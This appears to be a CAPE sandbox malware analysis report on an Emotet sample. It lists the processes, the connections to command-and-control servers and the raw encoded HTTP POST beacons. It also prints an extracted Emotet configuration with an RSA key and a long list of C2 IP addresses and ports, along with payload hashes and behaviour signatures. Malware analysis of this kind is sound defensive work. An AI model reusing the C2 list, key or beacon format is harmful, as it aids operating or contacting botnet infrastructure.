Full Path: C:\Windows\sysnative\wbem\WmiPrvSE.exe
Command Line: C:\Windows\system32\wbem\wmiprvse.exe -Embedding
taskhost.exe, PID: 2344, Parent PID: 460
Full Path: C:\Windows\sysnative\taskhost.exe
Command Line: "taskhost.exe"

Hosts

Direct IP Country Name
Y 94.183.71.206 [VT] Iran, Islamic Republic of
Y 91.83.93.105 [VT] Hungary
Y 125.99.61.162 [VT] India

TCP

Source Source Port Destination Destination Port
192.168.35.21 49190 125.99.61.162 7080
192.168.35.21 49194 91.83.93.105 8080
192.168.35.21 49195 91.83.93.105 8080
192.168.35.21 49196 91.83.93.105 8080
192.168.35.21 49197 91.83.93.105 8080
192.168.35.21 49199 91.83.93.105 8080
192.168.35.21 49201 91.83.93.105 8080
192.168.35.21 49202 91.83.93.105 8080
192.168.35.21 49203 91.83.93.105 8080
192.168.35.21 49204 91.83.93.105 8080
192.168.35.21 49205 91.83.93.105 8080
192.168.35.21 49206 91.83.93.105 8080
192.168.35.21 49207 91.83.93.105 8080
192.168.35.21 49208 91.83.93.105 8080
192.168.35.21 49193 94.183.71.206 7080

UDP

No UDP connections recorded.

DNS

No domains contacted.

HTTP Requests

URI Data
http://91.83.93.105:8080/prov/guids/entries/merge/
POST /prov/guids/entries/merge/ HTTP/1.1
Referer: http://91.83.93.105/prov/guids/entries/merge/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 502
Connection: Keep-Alive
Cache-Control: no-cache

QHJactnfvRy=Lwa%2BOAYTc1xSIANWqZoKsl4A2qK0i%2FNnjVPqqVEmZx8z5dP4Fp7EY5EYIT1paaiSObeRAJe19Dqf8AykGkMf4k%2F2z4M6QzzvfcwdWg9RM9XVYzV6EJ3PJ762fcCCgCh%2F3lmHkdMcxAx8T%2FfFcTv46Qis%2BuX8nuhHaXhnUxrpPo8cMfU9ZWzqumgCCA3Zp2ue9qAe1L3zUvqcrsDp79gJWW9nwqFK%2B8Dyf3qFaaNG1qNtBlB%2BPPpMmNPdF6PmffBdV9qcHg9Q5gaWzdjXFdq1gZGBCbs1XSpSbB0bRbrEuZKxd7AbjcpNTwO83MTqmiuO5W9%2F5s3rHdIuog%2BxAGdJfxSKO6%2FvwvFqCQOmFNU6%2BU8bH9bs8%2BmfXtNPSIpUlVMC0hLfBeUf9X2x%2FBik%2BX696dyJ85bSS1WoWadskluoTUQCvCdxPVeplqY3z1xsqn1FHSJdzg%3D%3D
http://91.83.93.105:8080/window/raster/between/
POST /window/raster/between/ HTTP/1.1
Referer: http://91.83.93.105/window/raster/between/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 509
Connection: Keep-Alive
Cache-Control: no-cache

M5HCc1FfwAfelDvbaS=OPwiYOkPqayJHqPAldTKS0phSpM%2B767OdqYa39pjPzxXTYO9cNTxEakBU%2FNlVNo%2FslW%2B3XCCAQM9oLuJjf8yu2W264XcBCz950A1i0FPHY0mOyINVEl6OmiKPL2MnI5l3lmHkdMcxAx8T%2FfFcTv46Qis%2BuX8nuhHaXhnUxrpPo8cMfU9ZWzqumgCCA3Zp2ue9qAe1L3zUvqcrsDp79gJWW9nwqFK%2B8Dyf3qFaaNG1qNtBlB%2BPPpMmNPdF6PmffBdV9qcHg9Q5gaWzdjXFdq1gZGBCbs1XSpSbB0bRbrEuZKxd7AbjcpNTwO83MTqmiuO5W9%2F5s3rHdIuog%2BxAGdJfxSKO6%2FvwvFqCQOmFNU6%2BU8bH9bs8%2BmfXtNPSIpUlVMC0hLfBeUf9X2x%2FBik%2BX696dyJ85bSS1WoWadskluoTUQCvCdxPVeplqY3z1xsqn1FHSJdzg%3D%3D
http://91.83.93.105:8080/balloon/balloon/
POST /balloon/balloon/ HTTP/1.1
Referer: http://91.83.93.105/balloon/balloon/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 498
Connection: Keep-Alive
Cache-Control: no-cache

UTRwnBQGjOwDH=u9Id5NbBx9t%2BDG8JRGOsjWeI3QZGDEVCLv2ErtKINwNgTXkkvq88SwR9tPDPK9fxu3769wqWYgrU3jZT20LOgO7NH97LbVs8SuELknMk9jTmKUH8Gp4Tc1tB96U2p37K3lmHkdMcxAx8T%2FfFcTv46Qis%2BuX8nuhHaXhnUxrpPo8cMfU9ZWzqumgCCA3Zp2ue9qAe1L3zUvqcrsDp79gJWW9nwqFK%2B8Dyf3qFaaNG1qNtBlB%2BPPpMmNPdF6PmffBdV9qcHg9Q5gaWzdjXFdq1gZGBCbs1XSpSbB0bRbrEuZKxd7AbjcpNTwO83MTqmiuO5W9%2F5s3rHdIuog%2BxAGdJfxSKO6%2FvwvFqCQOmFNU6%2BU8bH9bs8%2BmfXtNPSIpUlVMC0hLfBeUf9X2x%2FBik%2BX696dyJ85bSS1WoWadskluoTUQCvCdxPVeplqY3z1xsqn1FHSJdzg%3D%3D
http://91.83.93.105:8080/publish/
POST /publish/ HTTP/1.1
Referer: http://91.83.93.105/publish/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 489
Connection: Keep-Alive
Cache-Control: no-cache

rzMH=GxaRlFXNP37jDQ3uk4UtVOJyrlEaumHYcHAFyB4MoXCrDGbXJztLWPcBM3vfb6KMnw%2FzDCoXsTLR9dTGZaEqvWDtnSSOI9eZBqJU3C977Rr0KmpJv0XrTuEWude07E233lmHkdMcxAx8T%2FfFcTv46Qis%2BuX8nuhHaXhnUxrpPo8cMfU9ZWzqumgCCA3Zp2ue9qAe1L3zUvqcrsDp79gJWW9nwqFK%2B8Dyf3qFaaNG1qNtBlB%2BPPpMmNPdF6PmffBdV9qcHg9Q5gaWzdjXFdq1gZGBCbs1XSpSbB0bRbrEuZKxd7AbjcpNTwO83MTqmiuO5W9%2F5s3rHdIuog%2BxAGdJfxSKO6%2FvwvFqCQOmFNU6%2BU8bH9bs8%2BmfXtNPSIpUlVMC0hLfBeUf9X2x%2FBik%2BX696dyJ85bSS1WoWadskluoTUQCvCdxPVeplqY3z1xsqn1FHSJdzg%3D%3D
http://91.83.93.105:8080/report/cookies/
POST /report/cookies/ HTTP/1.1
Referer: http://91.83.93.105/report/cookies/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 500
Connection: Keep-Alive
Cache-Control: no-cache

4UkGkA8aDLdGTQjEg=l4hnbmmpbau9cvj3DAinQ2TX7TyDoZIQlE5HQCriT3J4vTdwMSsGQWtKPxIHhS2So0ln4kXvxPaWGyVJ0mctozFQndA6XCYJYFqrch73LcpSPcOjn7fiG5dtNIbbmdMK3lmHkdMcxAx8T%2FfFcTv46Qis%2BuX8nuhHaXhnUxrpPo8cMfU9ZWzqumgCCA3Zp2ue9qAe1L3zUvqcrsDp79gJWW9nwqFK%2B8Dyf3qFaaNG1qNtBlB%2BPPpMmNPdF6PmffBdV9qcHg9Q5gaWzdjXFdq1gZGBCbs1XSpSbB0bRbrEuZKxd7AbjcpNTwO83MTqmiuO5W9%2F5s3rHdIuog%2BxAGdJfxSKO6%2FvwvFqCQOmFNU6%2BU8bH9bs8%2BmfXtNPSIpUlVMC0hLfBeUf9X2x%2FBik%2BX696dyJ85bSS1WoWadskluoTUQCvCdxPVeplqY3z1xsqn1FHSJdzg%3D%3D
http://91.83.93.105:8080/prep/prov/enabled/merge/
POST /prep/prov/enabled/merge/ HTTP/1.1
Referer: http://91.83.93.105/prep/prov/enabled/merge/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 500
Connection: Keep-Alive
Cache-Control: no-cache

9HiShhn86ty=rzN3OIBV%2FKpCkFPc8LBTT6RaSEZrC9EXbbl6b6M3lPdq4lcbSbFK1f81SdRTV%2BvDzFGuYpP%2FJJnd4x9Ifu47oTuc2E4SskWHqCiB9GIWixBoqtaVD0ERzf3q4h0lu3i03lmHkdMcxAx8T%2FfFcTv46Qis%2BuX8nuhHaXhnUxrpPo8cMfU9ZWzqumgCCA3Zp2ue9qAe1L3zUvqcrsDp79gJWW9nwqFK%2B8Dyf3qFaaNG1qNtBlB%2BPPpMmNPdF6PmffBdV9qcHg9Q5gaWzdjXFdq1gZGBCbs1XSpSbB0bRbrEuZKxd7AbjcpNTwO83MTqmiuO5W9%2F5s3rHdIuog%2BxAGdJfxSKO6%2FvwvFqCQOmFNU6%2BU8bH9bs8%2BmfXtNPSIpUlVMC0hLfBeUf9X2x%2FBik%2BX696dyJ85bSS1WoWadskluoTUQCvCdxPVeplqY3z1xsqn1FHSJdzg%3D%3D
http://91.83.93.105:8080/loadan/
POST /loadan/ HTTP/1.1
Referer: http://91.83.93.105/loadan/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 509
Connection: Keep-Alive
Cache-Control: no-cache

xvs7woCKHDwFkLTJ=aljPm1kxdyQClPj27DOyXt4Lam%2FbVqLqxmpwJpGRATFbGTk6ED%2BTqR4XnUyT0ToXaQMx0UGcY%2BNkRBL3WiqNhue6d1bddA0bFpdNfNHp5O6NNMXoU45Pe9Hf%2B%2FJxEIDL3lmHkdMcxAx8T%2FfFcTv46Qis%2BuX8nuhHaXhnUxrpPo8cMfU9ZWzqumgCCA3Zp2ue9qAe1L3zUvqcrsDp79gJWW9nwqFK%2B8Dyf3qFaaNG1qNtBlB%2BPPpMmNPdF6PmffBdV9qcHg9Q5gaWzdjXFdq1gZGBCbs1XSpSbB0bRbrEuZKxd7AbjcpNTwO83MTqmiuO5W9%2F5s3rHdIuog%2BxAGdJfxSKO6%2FvwvFqCQOmFNU6%2BU8bH9bs8%2BmfXtNPSIpUlVMC0hLfBeUf9X2x%2FBik%2BX696dyJ85bSS1WoWadskluoTUQCvCdxPVeplqY3z1xsqn1FHSJdzg%3D%3D
http://91.83.93.105:8080/splash/splash/merge/
POST /splash/splash/merge/ HTTP/1.1
Referer: http://91.83.93.105/splash/splash/merge/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 501
Connection: Keep-Alive
Cache-Control: no-cache

SWLBp5qcHk=TcD915%2BoQxjc%2BiKkh7sKcPLm7IG%2BHxiJI6sd61D3tmrZScnS7bltuAykK%2BmzNEKCIVgWEY91Jot4LZlK0WsPodhrC5jezAvR1nNueg7oVtkygfZlYz87ywy4RtTnYavV3lmHkdMcxAx8T%2FfFcTv46Qis%2BuX8nuhHaXhnUxrpPo8cMfU9ZWzqumgCCA3Zp2ue9qAe1L3zUvqcrsDp79gJWW9nwqFK%2B8Dyf3qFaaNG1qNtBlB%2BPPpMmNPdF6PmffBdV9qcHg9Q5gaWzdjXFdq1gZGBCbs1XSpSbB0bRbrEuZKxd7AbjcpNTwO83MTqmiuO5W9%2F5s3rHdIuog%2BxAGdJfxSKO6%2FvwvFqCQOmFNU6%2BU8bH9bs8%2BmfXtNPSIpUlVMC0hLfBeUf9X2x%2FBik%2BX696dyJ85bSS1WoWadskluoTUQCvCdxPVeplqY3z1xsqn1FHSJdzg%3D%3D
http://91.83.93.105:8080/loadan/json/window/merge/
POST /loadan/json/window/merge/ HTTP/1.1
Referer: http://91.83.93.105/loadan/json/window/merge/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 496
Connection: Keep-Alive
Cache-Control: no-cache

rGvieJScQigbTSx=ZX7kPKt6sAmQHVwX1Imxq%2BFRtLNdJGHgiOyj7xg72WCBnoNuxStvCN9Egyk3t2klXx3DM4JFhgy2Mt9jzM3ezQr46UVDbxEDBL8k9pO82qi94VqSEj5%2FTvrAwp8NZ%2BbbWOb7EKgQqYmAkMsMQojfiTKNUJGe%2FjBIxXZdg401xOtYNd7jytIcxxcUPeLF7hhzxZj1DxaZcRHs%2FIOgoxqHQ9cuZLWAUeognWf7a7sL0z0DxlVG%2BswfDXQTwCPKg6u1JCyFprKMO68WuKoyDPmQqcOP1fDWGPoK7CkKdz6FzyDj%2FQE98seO9ir3xFuHuAPNlqQQ41w0BDk8StCYBDH8wUGeLrE1raZD1tPNxR5h1fhNjHaQVUfR%2Bmlrn3ds5r0RSOW2pQo9Uqxkg%2B4TmHT3sY1JWAcKysbUApx%2BaetdbsIAbIHT7h164RUPUbc7DWpr8PBlvA%3D%3D
http://91.83.93.105:8080/vermont/raster/scripts/merge/
POST /vermont/raster/scripts/merge/ HTTP/1.1
Referer: http://91.83.93.105/vermont/raster/scripts/merge/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 482
Connection: Keep-Alive
Cache-Control: no-cache

zdL56mp=RaFm1J13cIFo0e7q8vRgIaBx2cLfQWYgRKNfRWbUUY64lBqtJqWtEoJp6YwYw5r4GHJfKco7fByZQmNPdqM7u74RYQ09G6PE0L84k0dDtAaTZgyIk2rjNKOhdafEtB3kWOb7EKgQqYmAkMsMQojfiTKNUJGe%2FjBIxXZdg401xOtYNd7jytIcxxcUPeLF7hhzxZj1DxaZcRHs%2FIOgoxqHQ9cuZLWAUeognWf7a7sL0z0DxlVG%2BswfDXQTwCPKg6u1JCyFprKMO68WuKoyDPmQqcOP1fDWGPoK7CkKdz6FzyDj%2FQE98seO9ir3xFuHuAPNlqQQ41w0BDk8StCYBDH8wUGeLrE1raZD1tPNxR5h1fhNjHaQVUfR%2Bmlrn3ds5r0RSOW2pQo9Uqxkg%2B4TmHT3sY1JWAcKysbUApx%2BaetdbsIAbIHT7h164RUPUbc7DWpr8PBlvA%3D%3D
http://91.83.93.105:8080/window/ban/
POST /window/ban/ HTTP/1.1
Referer: http://91.83.93.105/window/ban/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 486
Connection: Keep-Alive
Cache-Control: no-cache

HHR3deh1O=HP9iiKD6wOMJlehHQoYdRPstLw5F8uCw0x0R9q9UrtnWSrl7qiZPh1CnIr%2BwW5uQTraHUDG8f8mLzMTPkqV5SQkF8ZsPSrJLGO4Z1rlclMKqDzUS43hGBGs7HJj81FclWOb7EKgQqYmAkMsMQojfiTKNUJGe%2FjBIxXZdg401xOtYNd7jytIcxxcUPeLF7hhzxZj1DxaZcRHs%2FIOgoxqHQ9cuZLWAUeognWf7a7sL0z0DxlVG%2BswfDXQTwCPKg6u1JCyFprKMO68WuKoyDPmQqcOP1fDWGPoK7CkKdz6FzyDj%2FQE98seO9ir3xFuHuAPNlqQQ41w0BDk8StCYBDH8wUGeLrE1raZD1tPNxR5h1fhNjHaQVUfR%2Bmlrn3ds5r0RSOW2pQo9Uqxkg%2B4TmHT3sY1JWAcKysbUApx%2BaetdbsIAbIHT7h164RUPUbc7DWpr8PBlvA%3D%3D
http://91.83.93.105:8080/window/merge/acquire/merge/
POST /window/merge/acquire/merge/ HTTP/1.1
Referer: http://91.83.93.105/window/merge/acquire/merge/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 492
Connection: Keep-Alive
Cache-Control: no-cache

UXdYEopSWau=XLdDkiZ6VpocaYwMXACnlbgL6qSmip2GlDZTQSqCTl0BSfLKPtFIuCOrNfjiefAhyyAc5JwX816d1R6YfGtA%2BguBY8cQYDU%2FEHT5ekGELfsp1U9ZR%2Bg4Tk4c6Sm9uolXWOb7EKgQqYmAkMsMQojfiTKNUJGe%2FjBIxXZdg401xOtYNd7jytIcxxcUPeLF7hhzxZj1DxaZcRHs%2FIOgoxqHQ9cuZLWAUeognWf7a7sL0z0DxlVG%2BswfDXQTwCPKg6u1JCyFprKMO68WuKoyDPmQqcOP1fDWGPoK7CkKdz6FzyDj%2FQE98seO9ir3xFuHuAPNlqQQ41w0BDk8StCYBDH8wUGeLrE1raZD1tPNxR5h1fhNjHaQVUfR%2Bmlrn3ds5r0RSOW2pQo9Uqxkg%2B4TmHT3sY1JWAcKysbUApx%2BaetdbsIAbIHT7h164RUPUbc7DWpr8PBlvA%3D%3D
http://91.83.93.105:8080/pnp/
POST /pnp/ HTTP/1.1
Referer: http://91.83.93.105/pnp/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 501
Connection: Keep-Alive
Cache-Control: no-cache

9wmYuuoExNs8V4ci=EZzF77SKSrFtPYTX5a0l9e4Kv4myTJwWtnbhxywt5vAWqkEtMF8%2F%2BGDX7bnDX7cMhlXxaGDSVwCBdxroNJxuvfgRCr7Cq%2BQ0XpWn%2FT05KcpTJGc7FW46S5ntX7rw%2BTStWOb7EKgQqYmAkMsMQojfiTKNUJGe%2FjBIxXZdg401xOtYNd7jytIcxxcUPeLF7hhzxZj1DxaZcRHs%2FIOgoxqHQ9cuZLWAUeognWf7a7sL0z0DxlVG%2BswfDXQTwCPKg6u1JCyFprKMO68WuKoyDPmQqcOP1fDWGPoK7CkKdz6FzyDj%2FQE98seO9ir3xFuHuAPNlqQQ41w0BDk8StCYBDH8wUGeLrE1raZD1tPNxR5h1fhNjHaQVUfR%2Bmlrn3ds5r0RSOW2pQo9Uqxkg%2B4TmHT3sY1JWAcKysbUApx%2BaetdbsIAbIHT7h164RUPUbc7DWpr8PBlvA%3D%3D

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

Source Destination ICMP Type Data
94.183.71.206 192.168.35.21 3
94.183.71.206 192.168.35.21 3
94.183.71.206 192.168.35.21 3

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

File name prepmspterm.exe
Associated Filenames
C:\Windows\SysWOW64\prepmspterm.exe
File Size 624643 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 0efd85b3915d9618f91979e65e520478
SHA1 e70ff18b0f850df07c81c168437f78d51c679625
SHA256 a1d4243b1e2380d5fc9d26ea036bd00c39f09cdcdfc1a3d2b699b5fc15cf29a0
CRC32 E6EF58FC
Ssdeep 6144:89b9SO5dVdRQ/vqkg1gEagdQHiQSzPgAJ76KkWv:8fBV7uikFgCShJkQ
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name fwtsqmfile00.sqm
Associated Filenames
C:\Windows\Temp\fwtsqmfile00.sqm
File Size 0 bytes
File Type empty
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
CRC32 00000000
Ssdeep 3::
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name fwtsqmfile00.sqm
Associated Filenames
C:\Windows\Temp\fwtsqmfile00.sqm
File Size 140 bytes
File Type data
MD5 71678c5fca12df60a2704dc3a41cf787
SHA1 928c09abb66da3ddaa2259c1ff3ac6d837c4d1e6
SHA256 e5cb21bec1bfd73f212c451725c54c43281c11c24f74fecf47b9fa62a933b053
CRC32 015F712F
Ssdeep 3:Hl1li9Qll+lllt/7V2lFCawoeeXtzlRPWgESl5llll:F2Qm/Ul3XtpR+y//
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name 9435f817-fed2-454e-88cd-7f78fda62c48
Associated Filenames
C:\Windows\sysnative\LogFiles\Scm\9435f817-fed2-454e-88cd-7f78fda62c48
File Size 12 bytes
File Type data
MD5 3f1046658d14d4935f38dc51ae2ee619
SHA1 71e0bd14e6959ad6c0bb0657de2c82e8ea40c3eb
SHA256 bebaea824a7e30a7e30e7eca2dcc83a8a67590a2eb408faab1b388466793826e
CRC32 AFC48A36
Ssdeep 3:8tln:8Xn
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
Type Emotet Config
RSA public key
-----BEGIN PUBLIC KEY----- MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOzoTryw1r9RxRJPFKalO4+q7JaDZWSB KZlEc22H6ITuE06tvJspue42TF1yk8xN+1bqW++QeV6Clm1uRswA/qoao/6p4eN0 h4zIO8PEaJ0C/9EO4cx9yfRLlVpjdEkP0QIDAQAB -----END PUBLIC KEY-----
address
125.99.61.162:7080
94.183.71.206:7080
91.83.93.105:8080
216.98.148.181:8080
68.183.190.199:8080
170.84.133.72:7080
139.5.237.27:443
5.77.13.70:80
46.29.183.211:8080
46.41.151.103:8080
182.188.39.68:80
170.84.133.72:8443
186.83.133.253:8080
46.28.111.142:7080
62.75.160.178:8080
178.79.163.131:8080
190.104.253.234:990
149.62.173.247:8080
178.249.187.151:8080
81.169.140.14:443
5.196.35.138:7080
80.85.87.122:8080
187.188.166.192:80
186.0.95.172:80
151.80.142.33:80
201.199.93.30:443
68.183.170.114:8080
183.82.97.25:80
71.244.60.231:7080
91.205.215.57:7080
190.85.152.186:8080
189.166.68.89:443
217.199.160.224:8080
203.25.159.3:8080
190.158.19.141:80
82.196.15.205:8080
181.188.149.134:80
5.1.86.195:8080
190.10.194.42:8080
78.189.76.2:50000
200.58.171.51:80
51.15.8.192:8080
185.86.148.222:8080
123.168.4.66:22
200.57.102.71:8443
89.188.124.145:443
190.38.14.52:80
190.230.60.129:80
185.187.198.10:8080
142.93.82.57:8080
109.104.79.48:8080
189.160.49.234:8443
201.183.247.58:443
119.159.150.176:443
138.68.106.4:7080
159.203.204.126:8080
79.143.182.254:8080
71.244.60.230:7080
201.163.74.202:443
181.36.42.205:443
91.83.93.124:7080
87.106.77.40:7080
200.51.94.251:143
181.29.101.13:8080
212.71.237.140:8080
79.129.0.173:8080
190.221.50.210:8080
119.92.51.40:8080
88.250.223.190:8080
46.163.144.228:80
77.55.211.77:8080
190.1.37.125:443
62.75.143.100:7080
119.59.124.163:8080
46.101.212.195:8080
109.169.86.13:8080
76.69.29.42:80
77.245.101.134:8080
114.79.134.129:443
186.1.41.111:443
86.42.166.147:80
50.28.51.143:8080
81.213.215.216:50000
184.69.214.94:20
190.230.60.129:8080
Download
Type Emotet Payload: 32-bit executable
Size 64000 bytes
Virtual Address 0x00350000
Process ygg9ytft62s5ip.exe
PID 1964
Path C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe
MD5 28c5662db657426c5e78e4d31520063b
SHA1 1c2f679193a05c1d7f9a717339ce80c1dc1cf7d5
SHA256 2f3f06820f6217631de47a015b3022e930683e20c53081f99bfe97f580ba91d9
CRC32 665ABF5A
Ssdeep 1536:GpEHGXHswgKUokPaPfkM8Mf7hBGz0A4Ya6F+ne3W:IzHsAUokS8u7h8IA4YdW
Yara None matched
CAPE Yara
  • Emotet
  • Emotet Payload
Download Download ZIP
Type Emotet Payload
Size 62464 bytes
Virtual Address 0x00360000
Process ygg9ytft62s5ip.exe
PID 1964
Path C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe
MD5 dcb0197535016499ee18d35041f7e8e7
SHA1 58c36b291f4487e523b2263791bd81a1944b7fa9
SHA256 7f51cf4468552a814cc613e1295274a4d3ac5b73f5a1d3537ce2eee1d5894e7b
CRC32 CABF28F3
Ssdeep 1536:PpEHGXHswgKUokPaPfkM8Mf7hBGz0A4Ya6F+neV:hzHsAUokS8u7h8IA4Yd
Yara None matched
CAPE Yara
  • Emotet
  • Emotet Payload
Download Download ZIP
Sorry! No process dumps.

Comments



No comments posted

Processing ( 27.421 seconds )

  • 24.476 BehaviorAnalysis
  • 1.499 CAPE
  • 0.441 Static
  • 0.362 Dropped
  • 0.333 TargetInfo
  • 0.109 TrID
  • 0.092 Deduplicate
  • 0.062 Strings
  • 0.04 NetworkAnalysis
  • 0.005 AnalysisInfo
  • 0.002 Debug

Signatures ( 8.504 seconds )

  • 0.76 api_spamming
  • 0.725 Doppelganging
  • 0.718 decoy_document
  • 0.635 NewtWire Behavior
  • 0.494 antidbg_windows
  • 0.425 dyre_behavior
  • 0.423 InjectionCreateRemoteThread
  • 0.401 injection_createremotethread
  • 0.399 injection_runpe
  • 0.347 infostealer_browser_password
  • 0.346 InjectionProcessHollowing
  • 0.344 infostealer_browser
  • 0.339 exploit_heapspray
  • 0.318 antidebug_guardpages
  • 0.31 ipc_namedpipe
  • 0.269 InjectionInterProcess
  • 0.258 reads_self
  • 0.165 stack_pivot
  • 0.1 antiav_detectreg
  • 0.086 lsass_credential_dumping
  • 0.042 injection_explorer
  • 0.041 mimics_filetime
  • 0.038 stealth_file
  • 0.037 antivm_generic_disk
  • 0.035 infostealer_ftp
  • 0.034 PlugX
  • 0.027 antivm_vbox_window
  • 0.026 bootkit
  • 0.026 virus
  • 0.026 stealth_timeout
  • 0.021 antivm_generic_scsi
  • 0.021 antisandbox_script_timer
  • 0.021 antianalysis_detectreg
  • 0.02 hancitor_behavior
  • 0.02 infostealer_im
  • 0.014 infostealer_mail
  • 0.01 recon_programs
  • 0.01 antivm_vbox_keys
  • 0.009 antivm_generic_services
  • 0.009 ransomware_files
  • 0.007 antiav_detectfile
  • 0.006 malicious_dynamic_function_loading
  • 0.006 antiemu_wine_func
  • 0.006 dynamic_function_loading
  • 0.006 antivm_vmware_keys
  • 0.005 uac_bypass_eventvwr
  • 0.005 antivm_vbox_libs
  • 0.005 kibex_behavior
  • 0.005 kovter_behavior
  • 0.005 antivm_xen_keys
  • 0.005 darkcomet_regkeys
  • 0.005 recon_fingerprint
  • 0.004 exploit_getbasekerneladdress
  • 0.004 betabot_behavior
  • 0.004 persistence_autorun
  • 0.004 antivm_parallels_keys
  • 0.004 geodo_banking_trojan
  • 0.004 infostealer_bitcoin
  • 0.004 ransomware_extensions
  • 0.003 antiav_avast_libs
  • 0.003 office_flash_load
  • 0.003 exploit_gethaldispatchtable
  • 0.003 shifu_behavior
  • 0.003 antivm_generic_diskreg
  • 0.003 antivm_vbox_files
  • 0.003 antivm_vpc_keys
  • 0.002 antisandbox_sleep
  • 0.002 antisandbox_sunbelt_libs
  • 0.002 antisandbox_sboxie_libs
  • 0.002 InjectionSetWindowLong
  • 0.002 vawtrak_behavior
  • 0.002 antiav_bitdefender_libs
  • 0.002 antianalysis_detectfile
  • 0.002 browser_security
  • 0.002 disables_browser_warn
  • 0.001 tinba_behavior
  • 0.001 hawkeye_behavior
  • 0.001 critical_process
  • 0.001 rat_nanocore
  • 0.001 rat_luminosity
  • 0.001 antivm_vmware_libs
  • 0.001 Vidar Behavior
